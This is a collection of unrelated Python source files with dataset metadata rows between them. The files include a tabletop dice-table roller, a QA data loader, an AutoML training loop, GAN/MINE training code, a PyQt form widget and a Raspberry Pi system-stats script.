#Created by: Shane
#
#Future Goals: Some sort of UI, better error handling.
#############################################
import random
import os
import collections
###
## This function is used to roll a D100. A D100 can only roll from 1 - 100 NO ZEROs
## Passed Variables are OPT and CHANCE, both should be arrays with OPT has all the possibility and CHANCE has the chances of those.
## OPT = HUMAN,DWARF,HAFLING CHANCE = 50, 75 ,100
## With the example above Human comes in on a roll 1-50, Dwarf from 5-75, and Halfing from 75-100
#
def PickTable(opt,chance):
roll,x = random.randint(1,100),0
if roll == 100:
roll = 99
for n in opt:
if roll <= chance[x]:
return(n)
else:
x=x+1
##DEFINE VARIBLES
raceopt = []
racechance = []
tablelist = []
tableopt = []
tablechance = []
tablepick = " "
racewinner = []
rolls = 0
racecount = []
flagg = 0
## Open FF with the input and one for output
## I should add some error handling here.
f = open('C:/pyt/RollInput.txt')
fw = open('C:/pyt/RollOutput.txt', 'w')
for line in f:
if line[0] == '#': ## Check for commented lines in the FF
continue
if flagg == 0:
rolls = int(line) ## The first line in the file is how many times you want to roll on the table(s)
flagg = 1 ## done with first line, NEVER COME BACK
continue
line = line.rstrip('\n') ## Remove any new line chars from the line.
if line == '--New Table':
continue ## do nothing if it's a table start.
elif line == '--End Table':
# In this part we are creating a table of table values and chances so we can roll on everything later
# The advantage of doing this is if the table list in the FF is out of order we don't have to read over everything.
#Add racechance/raceopt into a array for later
#Once you are at the end of the table store table values.
#I should move this to the end of the for loop...
tableopt.append(raceopt)
tablechance.append(racechance)
raceopt = []
racechance = []
else:
if not line[0].isdigit():
tablelist.append(line)
## If the line has no digit at the start this means we table name! Store this value to come back into it.
else:
## Start creating the chance and value parts of the two arrays needed to roll on.
raceopt.append(int(line[:2]))
racechance.append(line[3:])
## This below loop we go pick one race each time through and the input(rolls) is set in the FF.
## the rolls value is how many times we want to pick a value from the list.
for x in range(0,rolls):
## Now we have all the table names, values, and chance. LETS ROLL!
for x, table in enumerate(tablelist):
if tablepick == ' ':
## First time in here. Roll on the top most/ first table.
tablepick = PickTable(tablechance[x],tableopt[x])
elif tablepick in tablelist:
## The value rolled from before is another table, lets find that table and roll on it.
i = tablelist.index(tablepick)
tablepick = PickTable(tablechance[i],tableopt[i])
else:
## We rolled a value and that value is not a table. We can press forward.
continue
# We picked a winner, lets store it then finish the outside loop.
racewinner.append(tablepick)
tablepick = ' '
## convert the racewinner array into a set so we can do some quick counting
raceset = set(racewinner)
## we will count how many times each race won, and what percent it was selected.
for qk in raceset:
racecount.append(str(qk +" was rolled " + str(racewinner.count(qk)) + " times Which is a " + str((racewinner.count(qk)/rolls)*100) +"% "))
for qk in racecount:
fw.write(str(qk) + str())
fw.write("\n")
fw.write("-----------------------------------------------------------\n")
for ele in racewinner:
fw.write(ele + "\n")
## Close up all the files.
f.close
fw.close
| true |
065399bd7cafec5bccc9e0d576ca868be50186a2 | Python | sarahclarke-skc/week_03-day_3-flask_lab | /models/order.py | UTF-8 | 345 | 3.21875 | 3 | [] | no_license | class Order:
def __init__(self, customer_name, order_date, book, total_cost):
self.customer_name = customer_name
self.order_date = order_date
self.book = book
self.total_cost = total_cost
def pence_to_pounds(self):
corrected_format = self.total_cost / 100
return f"{corrected_format:.2f}" | true |
05cdf9da96c996f20df73d5eba4fbc434082bb77 | Python | geneRocket/albert_bidaf | /data.py | UTF-8 | 7,403 | 2.640625 | 3 | [] | no_license | import json, os
import random
import torch
def load_data(filename):
D = []
for d in json.load(open(filename))['data'][0]['paragraphs']:
for qa in d['qas']:
D.append([
qa['id'], d['context'], qa['question'],
[a['text'] for a in qa.get('answers', [])]
])
random.shuffle(D)
return D
def search(pattern, sequence):
"""从sequence中寻找子串pattern
如果找到,返回第一个下标;否则返回-1。
"""
n = len(pattern)
for i in range(len(sequence)):
if sequence[i:i + n] == pattern:
return i
return -1
class DataGenerator():
def __init__(self,json_path,tokenizer,device):
self.train_data = load_data(json_path)
print(len(self.train_data))
self.tokenizer=tokenizer
self.device=device
def batchIter(self,batch_size):
batch_p=[]
batch_q=[]
batch_start=[] #答案在context的下标
batch_end=[]
batch_context_len=[]
batch_question_len=[]
batch_ans_ids=[]
batch_answers=[]
for cnt,(id,context,question,answers) in enumerate(self.train_data):
max_len=240
if(len(context)>max_len):
context=context[:max_len]
context_ids=self.tokenizer.encode(context)[1:-1]
question_ids=self.tokenizer.encode(question)[1:-1]
answer=random.choice(answers)
ans_ids = self.tokenizer.encode(answer)[1:-1]
has_answer = search(ans_ids, context_ids)
if has_answer == -1:
continue
batch_p.append(context)
batch_q.append(question)
batch_ans_ids.append(ans_ids)
batch_answers.append(answer)
batch_context_len.append(len(context_ids))
batch_question_len.append(len(question_ids))
if len(batch_p)>=batch_size or cnt==len(self.train_data)-1:
ret=self.tokenizer.batch_encode_plus(zip(batch_p,batch_q),pad_to_max_length=True)
batch_pair_ids=ret['input_ids']
batch_token_type_ids=ret['token_type_ids']
batch_attention_mask=ret['attention_mask']
for i in range(len(batch_pair_ids)):
start_idx=search(batch_ans_ids[i], batch_pair_ids[i])-1 #[cls]para[sep]ques[sep],后面需要拆开para和ques,所以以para为参考
batch_start.append(start_idx)
batch_end.append(start_idx+len(batch_ans_ids[i])-1)
batch_pair_ids = torch.tensor(batch_pair_ids).to(self.device)
batch_token_type_ids = torch.tensor(batch_token_type_ids).to(self.device)
batch_attention_mask = torch.tensor(batch_attention_mask).to(self.device)
batch_start = torch.tensor(batch_start).to(self.device)
batch_end = torch.tensor(batch_end).to(self.device)
yield {
"batch_pair_ids": batch_pair_ids,
"batch_token_type_ids": batch_token_type_ids,
"batch_attention_mask": batch_attention_mask,
"batch_start": batch_start,
"batch_end": batch_end,
"batch_context_len":batch_context_len,
"batch_question_len":batch_question_len,
"batch_answers":batch_answers,
"batch_p":batch_p,
}
batch_p=[]
batch_q=[]
batch_start=[]
batch_end=[]
batch_context_len=[]
batch_question_len=[]
batch_ans_ids=[]
batch_answers=[]
def batchIterNoAnswer(self, batch_size,ignore_id=set()):
batch_id=[]
batch_p=[]
batch_q=[]
batch_context_ids=[]
batch_context_len=[]
batch_question_len=[]
for cnt,(id,context,question,_) in enumerate(self.train_data):
if(id in ignore_id):
continue
max_len=240
if(len(context)>max_len):
context=context[:max_len]
context_ids=self.tokenizer.encode(context)[1:-1]
question_ids=self.tokenizer.encode(question)[1:-1]
batch_id.append(id)
batch_p.append(context)
batch_q.append(question)
batch_context_len.append(len(context_ids))
batch_question_len.append(len(question_ids))
batch_context_ids.append(context_ids)
if len(batch_p)>=batch_size or cnt==len(self.train_data)-1:
ret=self.tokenizer.batch_encode_plus(zip(batch_p,batch_q),pad_to_max_length=True)
batch_pair_ids=ret['input_ids']
batch_token_type_ids=ret['token_type_ids']
batch_attention_mask=ret['attention_mask']
batch_pair_ids = torch.tensor(batch_pair_ids).to(self.device)
batch_token_type_ids = torch.tensor(batch_token_type_ids).to(self.device)
batch_attention_mask = torch.tensor(batch_attention_mask).to(self.device)
yield {
"batch_id":batch_id,
"batch_pair_ids": batch_pair_ids,
"batch_token_type_ids": batch_token_type_ids,
"batch_attention_mask": batch_attention_mask,
"batch_context_ids":batch_context_ids,
"batch_context_len":batch_context_len,
"batch_question_len":batch_question_len,
"batch_p":batch_p,
}
batch_p=[]
batch_q=[]
batch_id=[]
batch_context_ids=[]
batch_context_len=[]
batch_question_len=[]
def test():
from transformers import BertTokenizer
import torch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
pretrained = 'albert_chinese_tiny'
tokenizer = BertTokenizer.from_pretrained(pretrained)
data_gen=DataGenerator("../data/demo/demo_train.json",tokenizer,device)
for batch in data_gen.batchIter(2):
batch_start=batch["batch_start"]
batch_end=batch["batch_end"]
batch_pair_ids=batch["batch_pair_ids"]
batch_answers=batch["batch_answers"]
batch_p=batch["batch_p"]
for i in range(len(batch_start)):
start=batch_start[i].item()
end=batch_end[i].item()
decode_answer=tokenizer.decode(batch_pair_ids[i][start+1:end+1+1]).replace(" ","")
if(decode_answer!=batch_answers[i]):
print(batch_answers[i])
print(decode_answer)
print("===========")
print("************************")
for batch in data_gen.batchIterNoAnswer(2):
batch_pair_ids=batch["batch_pair_ids"]
batch_token_type_ids=batch["batch_token_type_ids"]
batch_p=batch["batch_p"]
batch_context_ids=batch["batch_context_ids"]
for i in range(len(batch_pair_ids)):
print(tokenizer.decode(batch_pair_ids[i]))
print(tokenizer.decode(batch_context_ids[i]))
print("===============")
if __name__ == "__main__":
test()
| true |
0661dfd57d7799f6139fe616c970a90b4f5c4d5b | Python | TheCodeWizard27/MissionEuropa | /view.py | UTF-8 | 632 | 3.09375 | 3 | [] | no_license | from hitbox import Hitbox
from vector2d import Vector2D
#sichtfeld class
class View:
pos = None;
size = None;
hitbox = None;
#constructor erstellt standart sicht mit hitbox
def __init__(self):
self.pos = Vector2D(0,0);
self.size = Vector2D(154,50);
self.hitbox = Hitbox(Vector2D(self.pos.x+1,self.pos.y+1),Vector2D(self.size.x -2, self.size.y -1));
#updated die position des Sichtfeldes
def update(self, speed):
self.pos.x += speed;
self.hitbox.update_pos(Vector2D(self.pos.x-5,self.pos.y+3));
#löscht alle daten vom sichtfeld
def delete(self):
self.pos = None;
self.size = None;
self.hitbox = None; | true |
577b8d25275c0cd1fa03056619b322af3af08c1d | Python | RualPerez/AutoML | /training.py | UTF-8 | 2,641 | 2.890625 | 3 | [] | no_license | import torch
from childNet import ChildNet
from utils import fill_tensor, indexes_to_actions
from torch.autograd import Variable
def training(policy, batch_size, total_actions, verbose = False, num_episodes = 500):
''' Optimization/training loop of the policy net. Returns the trained policy. '''
# training settings
decay = 0.9
training = True
# childNet
cn = ChildNet(policy.layer_limit)
nb_epochs = 100
# train policy network
training_rewards, val_rewards, losses = [], [], []
baseline = torch.zeros(15, dtype=torch.float)
print('start training')
for i in range(num_episodes):
if i%100 == 0: print('Epoch {}'.format(i))
rollout, batch_r, batch_a_probs = [], [], []
#forward pass
with torch.no_grad():
prob, actions = policy(training)
batch_hid_units, batch_index_eos = indexes_to_actions(actions, batch_size, total_actions)
#compute individually the rewards
for j in range(batch_size):
# policy gradient update
if verbose:
print(batch_hid_units[j])
r = cn.compute_reward(batch_hid_units[j], nb_epochs)**3
if batch_hid_units[j]==['EOS']:
r -= -1
a_probs = prob[j, :batch_index_eos[j] + 1]
batch_r += [r]
batch_a_probs += [a_probs.view(1, -1)]
#rearrange the action probabilities
a_probs = []
for b in range(batch_size):
a_probs.append(fill_tensor(batch_a_probs[b], policy.n_outputs, ones=True))
a_probs = torch.stack(a_probs,0)
#convert to pytorch tensors --> use get_variable from utils if training in GPU
batch_a_probs = Variable(a_probs, requires_grad=True)
batch_r = Variable(torch.tensor(batch_r), requires_grad=True)
# classic traininng steps
loss = policy.loss(batch_a_probs, batch_r, torch.mean(baseline))
policy.optimizer.zero_grad()
loss.backward()
policy.optimizer.step()
# actualize baseline
baseline = torch.cat((baseline[1:]*decay, torch.tensor([torch.mean(batch_r)*(1-decay)], dtype=torch.float)))
# bookkeeping
training_rewards.append(torch.mean(batch_r).detach().numpy())
losses.append(loss.item())
# print training
if verbose and (i+1) % val_freq == 0:
print('{:4d}. mean training reward: {:6.2f}, mean loss: {:7.4f}'.format(i+1, np.mean(training_rewards[-val_freq:]), np.mean(losses[-val_freq:])))
print('done training')
return policy | true |
03a6f137ef087066e805c6a0df59a54e2300cddf | Python | dabay/LeetCodePython | /263UglyNumber.py | UTF-8 | 1,397 | 3.921875 | 4 | [] | no_license | # -*- coding: utf8 -*-
'''
__author__ = 'dabay.wang@gmail.com'
263: Ugly Number
https://leetcode.com/problems/ugly-number/
Write a program to check whether a given number is an ugly number.
Ugly numbers are positive numbers whose prime factors only include 2, 3, 5.
For example, 6, 8 are ugly while 14 is not ugly since it includes another prime factor 7.
Note that 1 is typically treated as an ugly number.
=== Comments by Dabay===
用几个遍历来记录是否还可能被2,3,5整除,减少模运算的次数。
'''
class Solution(object):
def isUgly(self, num):
"""
:type num: int
:rtype: bool
"""
if num <= 0:
return False
div_2, div_3, div_5 = True, True, True
while div_2 or div_3 or div_5:
if div_2 and num % 2 == 0:
num = num / 2
continue
else:
div_2 = False
if div_3 and num % 3 == 0:
num = num / 3
continue
else:
div_3 = False
if div_5 and num % 5 == 0:
num = num / 5
continue
else:
div_5 = False
return num == 1
def main():
sol = Solution()
print sol.isUgly(14)
if __name__ == "__main__":
import time
start = time.clock()
main()
print "%s sec" % (time.clock() - start) | true |
f7ad053e1b668729d0d2a6e669178f00ade6ff06 | Python | BrandonKates/AttEx | /flask-api/grammar.py | UTF-8 | 3,806 | 2.8125 | 3 | [] | no_license | import json
from lark import Lark, Transformer, v_args
from lark.lexer import Token
parser = Lark(r"""
start: _NL? production+
production: VAR "->" value_list _NL
value_list: value+ | value+ "|" value_list
value: VAR | VALUE | COORD
VAR: /[A-Z]/
VALUE: /[\w.?!\'-]{2,}|[a-z.?\'-]{1,}/+
COORD: /\([0-9], [0-9]\)/
%import common.NEWLINE -> _NL
%import common.WS_INLINE
%import common.LETTER
%ignore WS_INLINE
""")
@v_args(inline=True)
class CFGTokenTransformer(Transformer):
def value(self, value_token):
return value_token
def value_list(self, *value_list):
newList = []
strs = []
for value in value_list:
if(type(value) == Token):
strs.append(value)
if(type(value) == list):
newList.extend(value)
newList.append(strs)
return newList
def production(self, key, value):
return (key, value)
def start(self, *sections):
return {name: data for name, data in sections}
@v_args(inline=True)
class CFGStringTransformer(Transformer):
def value(self, value_token):
return value_token
def value_list(self, *value_list):
newList = []
strs = []
for value in value_list:
if(type(value) == Token):
strs.append(value)
if(type(value) == list):
newList.extend(value)
newList.append(strs)
return newList
def production(self, key, value):
value_out = []
for lst in value:
proc = processOneValueList(lst)
value_out.append(proc)
return (key, value_out)
def start(self, *sections):
return {name.value: data for name, data in sections}
def processOneValueList(value_list):
value_var_list = []
value = ''
for token in value_list:
if token.type == 'VALUE':
value+= token.value + ' '
elif token.type == 'VAR' or token.type == 'COORD':
if len(value)!=0:
value_var_list.append(value)
value = ''
value_var_list.append(token.value)
if len(value)!=0:
value_var_list.append(value)
value_var_list = [i.strip() for i in value_var_list]
return value_var_list
def parseGrammar(grammar):
return parser.parse(grammar)
def parseGrammarToString(grammar):
r = parseGrammar(grammar)
return CFGStringTransformer().transform(r)
def parseGrammarToTokens(grammar):
r = parseGrammar(grammar)
return CFGTokenTransformer().transform(r)
'''
For example we might just want to pass a single 'S' tag, up to 3 'Q' tags or just give more information about the productions and rules
'''
def custom_rules(rules):
return None
def getGrammarJSON(grammar):
grammarString = parseGrammarToString(grammar)
return json.dumps(grammarString)
if __name__ == "__main__":
grammar = '''S -> is this C ? Y | how is C different from C ? C specializes C because A | how is C different from C ? C is like C except that A | if not C what is it ? C | i don't know what P is ? P is located at L in I | i don't know what R is ? R is M in I than I | i don't know what B is ? B is H in I .
C -> deer | bear | dog | cat | panda .
A -> Q and A | Q .
Q -> it is M R | it is B | it has N O | its P is M R | its P is B .
M -> more | less .
R -> small | furry | long | thin | chubby .
B -> black | brown | red | white .
N -> no | .
O -> Ps | P .
P -> eye | leg | horn | snout | eye-spot .
Y -> yes | no .
L -> (0, 0) .
I -> imagejpeg | image2jpeg .
H -> present | absent .
'''
print(getGrammarJSON(grammar))
print(parseGrammarToTokens(grammar))
# REGEX: [\w|.!?'-]{2,}|\.|\?|[a-z]{1}|\([0-9], [0-9]\) | true |
804f925366c8a1f90b137b8b66e0200b5af4a9a8 | Python | charliegriffin/GraduateUnschool | /mySolutions/6.01SCs2011/swLab02/2.1.4CommentsMachine.py | UTF-8 | 1,474 | 3.140625 | 3 | [] | no_license | import lib601.sm as sm
class CommentsSM(sm.SM): # This works just like the turnstyle in 2.1.2
startState = 'off'
def getNextValues(self, state, inp):
if state == 'off':
if inp == '#':
return('on',inp) # its on so start reading
else:
return('off',None) # its off so stop reading
if state == "on":
if inp == '\n':
return('off',None)
else:
return('on',inp)
def runTestsComm():
m = CommentsSM()
# Return only the outputs that are not None
print 'Test1:', [c for c in CommentsSM().transduce(x1) if not c==None]
print 'Test2:', [c for c in CommentsSM().transduce(x2) if not c==None]
# Test that self.state is not being changed.
m = CommentsSM()
m.start()
[m.getNextValues(m.state, i) for i in ' #foo #bar']
print 'Test3:', [c for c in [m.step(i) for i in x2] if not c==None]
# execute runTestsComm() to carry out the testing, you should get:
runTestsComm()
#Test1: ['#', ' ', 'f', 'u', 'n', 'c', '#', ' ', 't', 'e', 's', 't', '#', ' ', 'c', 'o', 'm', 'm', 'e', 'n', 't']
#Test2: ['#', 'i', 'n', 'i', 't', 'i', 'a', 'l', ' ', 'c', 'o', 'm', 'm', 'e', 'n', 't', '#', ' ', 'f', 'u', 'n', 'c', '#', ' ', 't', 'e', 's', 't', '#', ' ', 'c', 'o', 'm', 'm', 'e', 'n', 't']
#Test3: ['#', 'i', 'n', 'i', 't', 'i', 'a', 'l', ' ', 'c', 'o', 'm', 'm', 'e', 'n', 't', '#', ' ', 'f', 'u', 'n', 'c', '#', ' ', 't', 'e', 's', 't', '#', ' ', 'c', 'o', 'm', 'm', 'e', 'n', 't']
################################## | true |
07f807e713460039b40e6c5b12e7aa7cb265394f | Python | lvah/201903python | /day05/code/10_with语句.py | UTF-8 | 481 | 3.453125 | 3 | [] | no_license | """
with语句工作原理:
python中的with语句使用于对资源进行访问的场合,
保证不管处理过程中是否发生错误或者异常都会自动
执行规定的(“清理”)操作,释放被访问的资源,
比如有文件读写后自动关闭、线程中锁的自动获取和释放等。
"""
with open('doc/passwd') as f:
print("with语句里面:", f.closed)
print(f.read(10))
print("with语句外面:", f.closed) | true |
a8f3e282154330f27332193291a81984520c3341 | Python | diana134/afs | /Code/pieceWidget.py | UTF-8 | 4,715 | 2.8125 | 3 | [] | no_license | """The widget for adding a Selection to an Entry"""
import sys
import os.path
sys.path.insert(0, os.path.join("..", "Forms"))
from PyQt4.QtGui import QWidget
from PyQt4.QtCore import QTime
from ui_pieceWidget import Ui_PieceWidget
from utilities import sanitize
class PieceWidget(QWidget):
def __init__(self, parent=None, piece=None):
# Initialize object
super(PieceWidget, self).__init__(parent)
self.ui = Ui_PieceWidget()
self.ui.setupUi(self)
self.dance() # Slightly cheater way to start the ui properly
# Initialize class variables
self.disciplines = {'Dance' : self.dance, # For Pythonic switch-case
'Piano' : self.piano,
'Choral' : self.choral,
'Vocal' : self.vocal,
'Instrumental' : self.instrumental,
'Band' : self.band,
'Speech' : self.speech
}
# Initialize ui if piece was given
if piece is not None:
self.ui.titleLineEdit.setText(piece['title'])
self.ui.titleOfMusicalLineEdit.setText(piece['titleOfMusical'])
self.ui.composerLineEdit.setText(piece['composerArranger'])
time = piece['performanceTime']
if len(piece['performanceTime']) < 5:
# pad with leading 0
time = '0' + time
self.ui.performanceTimeEdit.setTime(QTime.fromString(time, "mm:ss"))
def clearFields(self):
"""Clears and resets the fields"""
self.ui.titleLineEdit.clear()
self.ui.titleOfMusicalLineEdit.clear()
self.ui.composerLineEdit.clear()
self.ui.performanceTimeEdit.setTime(QTime(0, 0, 0))
def getFields(self):
"""Returns a dictionary of all the fields, stripped and sanitized"""
fields = {}
fields['title'] = str(self.ui.titleLineEdit.text()).strip()
fields['title'] = sanitize(fields['title'])
fields['titleOfMusical'] = str(self.ui.titleOfMusicalLineEdit.text()).strip()
fields['titleOfMusical'] = sanitize(fields['titleOfMusical'])
fields['composerArranger'] = str(self.ui.composerLineEdit.text()).strip()
fields['composerArranger'] = sanitize(fields['composerArranger'])
# Don't need to sanitize a timeEdit
fields['performanceTime'] = str(self.ui.performanceTimeEdit.time().toString("m:ss"))
return fields
def changeDiscipline(self, text):
"""changes which fields are enabled based on the selected discipline"""
if str(text) in self.disciplines:
self.disciplines[str(text)]()
# self.clearFields()
def dance(self):
self.ui.titleOfMusicalLabel.setEnabled(False)
self.ui.titleOfMusicalLineEdit.setEnabled(False)
self.ui.titleOfMusicalLineEdit.clear()
self.ui.composerLabel.setEnabled(False)
self.ui.composerLineEdit.setEnabled(False)
self.ui.composerLineEdit.clear()
def piano(self):
self.ui.titleOfMusicalLabel.setEnabled(False)
self.ui.titleOfMusicalLineEdit.setEnabled(False)
self.ui.titleOfMusicalLineEdit.clear()
self.ui.composerLabel.setEnabled(True)
self.ui.composerLineEdit.setEnabled(True)
def choral(self):
self.ui.titleOfMusicalLabel.setEnabled(False)
self.ui.titleOfMusicalLineEdit.setEnabled(False)
self.ui.titleOfMusicalLineEdit.clear()
self.ui.composerLabel.setEnabled(True)
self.ui.composerLineEdit.setEnabled(True)
def vocal(self):
self.ui.titleOfMusicalLabel.setEnabled(True)
self.ui.titleOfMusicalLineEdit.setEnabled(True)
self.ui.composerLabel.setEnabled(True)
self.ui.composerLineEdit.setEnabled(True)
def instrumental(self):
self.ui.titleOfMusicalLabel.setEnabled(False)
self.ui.titleOfMusicalLineEdit.setEnabled(False)
self.ui.titleOfMusicalLineEdit.clear()
self.ui.composerLabel.setEnabled(True)
self.ui.composerLineEdit.setEnabled(True)
def band(self):
self.ui.titleOfMusicalLabel.setEnabled(False)
self.ui.titleOfMusicalLineEdit.setEnabled(False)
self.ui.titleOfMusicalLineEdit.clear()
self.ui.composerLabel.setEnabled(True)
self.ui.composerLineEdit.setEnabled(True)
def speech(self):
self.ui.titleOfMusicalLabel.setEnabled(False)
self.ui.titleOfMusicalLineEdit.setEnabled(False)
self.ui.titleOfMusicalLineEdit.clear()
self.ui.composerLabel.setEnabled(True)
self.ui.composerLineEdit.setEnabled(True)
| true |
bf495aa9b79388f997a0ef942b5e417f515a65ae | Python | hector81/Aprendiendo_Python | /Condicionales/NumeroMes.py | UTF-8 | 864 | 3.96875 | 4 | [] | no_license | numeroMes = 0
# bucle para poner numero correto
while numeroMes < 1 or numeroMes > 12:
# ponemos el numero
numeroMes = int(input('Escribe el número de mes '))
if numeroMes < 1 or numeroMes > 12:
print('El número debe ser entre 1 y 12')
else:
print('El número de mes corresponde a ')
if numeroMes == 1:
print('Enero ')
elif numeroMes == 2:
print('Febrero')
elif numeroMes == 3:
print('Marzo')
elif numeroMes == 4:
print('Abril')
elif numeroMes == 5:
print('Mayo')
elif numeroMes == 6:
print('Junio')
elif numeroMes == 7:
print('Julio')
elif numeroMes == 8:
print('Agosto')
elif numeroMes == 9:
print('Septiembre')
elif numeroMes == 10:
print('Octubre')
elif numeroMes == 11:
print('Noviembre')
elif numeroMes == 12:
print('Diciembre')
| true |
f49cf0034a16d97bcaeb31d36452fd33ebb2590a | Python | Hitoshi-Nakanishi/MINE | /models/MINE_GANVDB/training.py | UTF-8 | 5,356 | 2.546875 | 3 | [] | no_license | from tqdm import tqdm
import numpy as np
import torch
import matplotlib.pyplot as plt
def update_target(ma_net, net, update_rate=1e-1):
# update moving average network parameters using network
for ma_net_param, net_param in zip(ma_net.parameters(), net.parameters()):
ma_net_param.data.copy_((1.0 - update_rate) \
* ma_net_param.data + update_rate*net_param.data)
def vib(mu, sigma, alpha=1e-8):
d_kl = 0.5 * torch.mean((mu ** 2) + (sigma ** 2)
- torch.log((sigma ** 2) + alpha) - 1)
return d_kl
def learn_discriminator(x, G, D , M, D_opt, BATCH_SIZE, zero_gp=True, vdb=True, USE_GPU=True):
'''
real_samples : torch.Tensor
G : Generator network
D : Discriminator network
M : Mutual Information Neural Estimation(MINE) network
D_opt : Optimizer of Discriminator
'''
z = torch.randn((BATCH_SIZE, 10))
if USE_GPU:
z = z.cuda()
x = x.cuda()
x_tilde = G(z)
Dx_tilde, Dmu_tilde, Dsigma_tilde = D(x_tilde)
if zero_gp:
# zero centered gradient penalty : https://arxiv.org/abs/1801.04406
x.requires_grad = True
Dx, Dmu, Dsigma = D(x)
grad = torch.autograd.grad(Dx, x, create_graph=True,
grad_outputs=torch.ones_like(Dx),
retain_graph=True, only_inputs=True)[0].view(BATCH_SIZE, -1)
grad = grad.norm(dim=1)
gp_loss = torch.mean(grad**2)
else:
Dx, Dmu, Dsigma = D(x)
if vdb:
# information bottleneck
vib_loss = (vib(Dmu, Dsigma) + vib(Dmu_tilde, Dsigma_tilde))/2
loss = 0.
gan_loss = - torch.log(Dx).mean() - torch.log(1-Dx_tilde).mean()
loss += gan_loss
if zero_gp:
loss += 1.0 * gp_loss
if vdb:
loss += 0.1 * vib_loss
D_opt.zero_grad()
loss.backward()
D_opt.step()
if zero_gp:
return gan_loss.item(), gp_loss.item()
return gan_loss.item(), 0
def learn_generator(x, G, D, M, G_opt, G_ma, BATCH_SIZE, mi_obj=False, USE_GPU=True):
'''
real_samples : torch.Tensor
G : Generator network
D : Discriminator network
M : Mutual Information Neural Estimation(MINE) network
G_opt : Optimizer of Generator
mi_reg : add Mutual information objective
'''
z = torch.randn((BATCH_SIZE, 10))
z_bar = torch.narrow(torch.randn((BATCH_SIZE, 10)), dim=1, start=0, length=3)
# which is for product distribution.
if USE_GPU:
z = z.cuda()
z_bar = z_bar.cuda()
x = x.cuda()
x_tilde = G(z)
Dx_tilde, Dmu_tilde, Dsimga_tilde = D(x_tilde)
loss = 0.
gan_loss = torch.log(1-Dx_tilde).mean()
loss += gan_loss
if mi_obj:
z = torch.narrow(z, dim=1, start=0, length=3) # slice for MI
mi = torch.mean(M(z, x_tilde)) - torch.log(torch.mean(torch.exp(M(z_bar, x_tilde)))+1e-8)
loss -= 0.01 * mi
G_opt.zero_grad()
loss.backward()
G_opt.step()
update_target(G_ma, G) # EMA GAN : https://arxiv.org/abs/1806.04498
return gan_loss.item()
def learn_mine(G, M, M_opt, BATCH_SIZE, ma_rate=0.001, USE_GPU=True):
'''
Mine is learning for MI of (input, output) of Generator.
'''
z = torch.randn((BATCH_SIZE, 10))
z_bar = torch.narrow(torch.randn((BATCH_SIZE, 10)), dim=1, start=0, length=3)
if USE_GPU:
z = z.cuda()
z_bar = z_bar.cuda()
x_tilde = G(z)
et = torch.mean(torch.exp(M(z_bar, x_tilde)))
if M.ma_et is None:
M.ma_et = et.detach().item()
M.ma_et += ma_rate * (et.detach().item() - M.ma_et)
z = torch.narrow(z, dim=1, start=0, length=3) # slice for MI
mutual_information = torch.mean(M(z, x_tilde)) - torch.log(et) * et.detach() / M.ma_et
loss = - mutual_information
M_opt.zero_grad()
loss.backward()
M_opt.step()
return mutual_information.item()
def train(G, D, M, G_opt, G_ma, D_opt, M_opt, BATCH_SIZE, x, z_test,
epoch_num=300, is_zero_gp=False, is_mi_obj=False, USE_GPU=True):
for i in range(1, epoch_num+1):
np.random.shuffle(x)
iter_num = len(x) // BATCH_SIZE
d_loss_arr, gp_loss_arr, g_loss_arr, mi_arr = [], [], [], []
for j in tqdm(range(iter_num)):
batch = torch.FloatTensor(x[BATCH_SIZE * j : BATCH_SIZE * j + BATCH_SIZE])
d_loss, gp_loss = learn_discriminator(batch, G, D, M, D_opt, BATCH_SIZE,
zero_gp=is_zero_gp, USE_GPU=USE_GPU)
g_loss = learn_generator(batch, G, D, M, G_opt, G_ma, BATCH_SIZE,
mi_obj=is_mi_obj, USE_GPU=USE_GPU)
mi = learn_mine(G, M, M_opt, BATCH_SIZE, USE_GPU=USE_GPU)
d_loss_arr.append(d_loss)
gp_loss_arr.append(gp_loss)
g_loss_arr.append(g_loss)
mi_arr.append(mi)
print('D loss : {0}, GP_loss : {1} G_loss : {2}, MI : {3}'.format(
round(np.mean(d_loss_arr),4), round(np.mean(gp_loss_arr)),
round(np.mean(g_loss_arr),4), round(np.mean(mi_arr),4)))
x_test = G_ma(z_test).data.cpu().numpy()
plt.title('Epoch {0}'.format(i))
plt.scatter(x_test[:,0], x_test[:,1], s=2.0)
plt.xlim((-10, 10))
plt.ylim((-10, 10))
plt.show()
| true |
e0ab9dfbe350628cae2717ff8bf8ac165e8e6626 | Python | zhou-en/raspberry-pi-stats | /pi_stats.py | UTF-8 | 1,154 | 3.078125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/python3
#-*- coding: utf-8 -*
import psutil
import math
to_gb = 1024*1024*1024
def get_cpu_stats():
x = lambda a : f"{a}%"
print(f"Physical Cores:\t{psutil.cpu_count(logical=False)}")
print(f"CPU Count:\t{psutil.cpu_count()}")
cpu_percent = psutil.cpu_percent(percpu=True, interval=0.1)
print(f"Percentages:\t{list(map(x, cpu_percent))}")
def get_memory_stats():
vmem = psutil.virtual_memory()
total_mem = vmem.total/to_gb
used_mem = vmem.used/to_gb
print(f"Total memory:\t{math.ceil(total_mem)} GB")
print("Memory used:\t%.2f GB" % used_mem)
def get_disk_stats():
path = "/home"
disk_usage = psutil.disk_usage(path=path)
used = disk_usage.used / to_gb
total = disk_usage.total / to_gb
free = disk_usage.free / to_gb
print(f"Disk Stats in {path}")
print("Total:\t%.1f GB" % total)
print("Used:\t%.1f GB" % used)
print("Percent:\t%.2f" % disk_usage.percent)
def main():
print("System Stats:")
print("=============")
get_cpu_stats()
print("\n")
get_memory_stats()
print("\n")
get_disk_stats()
if __name__== "__main__":
main()
| true |
bcafb7ced9c4b5ab511cde2ce57323906608a4bc | Python | thpthp1/EECS_132 | /Java 132 assignment 3/Python translate/Number.py | UTF-8 | 483 | 3.328125 | 3 | [] | no_license | from Calculator import Calculator
class Number(Calculator):
#note that the double underscore means dont access this (name mangling)
#override
def __init__(self, value):
self.__value = value
#override
def value(self, input = None):
return self.__value
#override
def derive(self):
return Number(0)
def __str__(self):
return str(self.value())
def __eq__(self, other):
if isinstance(other, Number):
return self.value() == other.value()
return False
| true |
1b8c35308baba34526c12cb3b89705474a3ae8d4 | Python | anantSinghCross/handwritten-digit-recognition | /trainer.py | UTF-8 | 2,710 | 3.15625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
@author: anantSinghCross
"""
import pandas as pd
import numpy as np
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras.utils import np_utils
import matplotlib.pyplot as plt
seed = 7
